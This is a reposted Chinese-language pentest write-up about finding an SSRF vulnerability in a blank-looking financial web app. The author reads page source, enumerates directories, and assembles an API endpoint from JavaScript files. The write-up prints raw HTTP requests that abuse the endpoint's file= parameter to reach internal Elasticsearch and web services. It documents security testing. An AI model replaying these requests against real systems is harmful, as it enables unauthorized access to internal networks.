!
也想出现在这里? 联系我们
创意广告

空白页面第三讲

在某次金融类项目中,直接访问系统无任何功能,几乎相当于404 Not Found,甚至连JavaScript文件一个都不存在,最终通过渗透经验和一定的运气,拿下了这个高危SSRF漏洞。
直接访问页面404,给了一个url:http://xxx-desktop.xxx.com/
图片[1]-空白页面第三讲-安全小天地
打开之后发现是白的,基本页面空白会加载一些js,直接查看源代码
图片[2]-空白页面第三讲-安全小天地
发现其中有几个类似于接口一样的路径
libs/plugins/jquery.js
./html/apply.html?data=
cxx/token/decrypt
第一个jquery.js http://xxx-desktop.xxx.com/libs/plugins/jquery.js,大家都知道这个很有可能是前端信息所以我们不看
第二个html/apply.html?data=,加载了当前目录下一个html文件,路径为:http://xxx-desktop.xxx.com/html/apply.html?data=,原本以为有什么东西,访问一下,发现404
图片[3]-空白页面第三讲-安全小天地
第三个cxx/token/decrypt,疑似接口路径,访问无果
图片[4]-空白页面第三讲-安全小天地
都是404?就这样就完了么
图片[5]-空白页面第三讲-安全小天地
http://xxx-desktop.xxx.com/html/
http://xxx-desktop.xxx.com/css/
http://xxx-desktop.xxx.com/js/
发现爆破出来的有403这不就是突破么
对html、css、js进行目录,在js下面发现了几个目录
图片[6]-空白页面第三讲-安全小天地
http://xxx-desktop.xxx.com/js/apply.js
http://xxx-desktop.xxx.com/js/pagination.js
http://xxx-desktop.xxx.com/js/common.js
继续去访问每一个js,发现common.js里面有一个接口目录:/xxxapi,尼玛目录这么复杂恶心谁呢
图片[7]-空白页面第三讲-安全小天地
在/js/apply.js中发现了系统接口:file/pdf/view?file=
图片[8]-空白页面第三讲-安全小天地
将一级接口目录/xxxapi/与系统接口file/pdf/view?file=进行拼接,组成可用接口:
http://xxx-desktop.xxx.com/xxxapi/file/pdf/view?file=
并且发现JavaScript代码中的逻辑是:接口 + ecsUrl,因此猜测file参数为一个URL。
接下来尝试调用接口进行SSRF利用。
首先,使用VPS监听端口,尝试直接利用SSRF访问我们的端口,发现成功接收到了Java语言进行的HTTP请求图片[9]-空白页面第三讲-安全小天地
到现在证明漏洞存在,然后ssrf请求一下内网信息瞅瞅,之前已经拿到了部分内网资产,所以可以直接访问
测试访问内网Elasticsearch服务:http://10.x.x.191:9200
GET /xxxapi/file/pdf/view?file=http://10.x.x.191:9200/ HTTP/1.1
Host: xxx-desktop.xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
图片[10]-空白页面第三讲-安全小天地
测试访问内网Web应用服务:http://10.x.x.65:8081/
GET /xxxhapi/file/pdf/view?file=http://10.x.x.65:8081 HTTP/1.1
Host: xxx-desktop.xxx.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

结束测试,好了空白页面大概我就这样了,大家参考一下就好,菜鸡在这里求点赞,谢谢。

文字来源于- 火线 Zone-云安全社区,安全小天地只做文章分享,如有侵权,请联系站长删除


「渗透云记」公众号里主要记录我每天的所思所想,我会坚持更新质量不错的文章,感兴趣的小伙伴可以扫描下方二维码,谢谢支持! 安全小天地 - 公众号 - 渗透云记
© 版权声明
THE END
喜欢就支持一下吧
点赞14 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容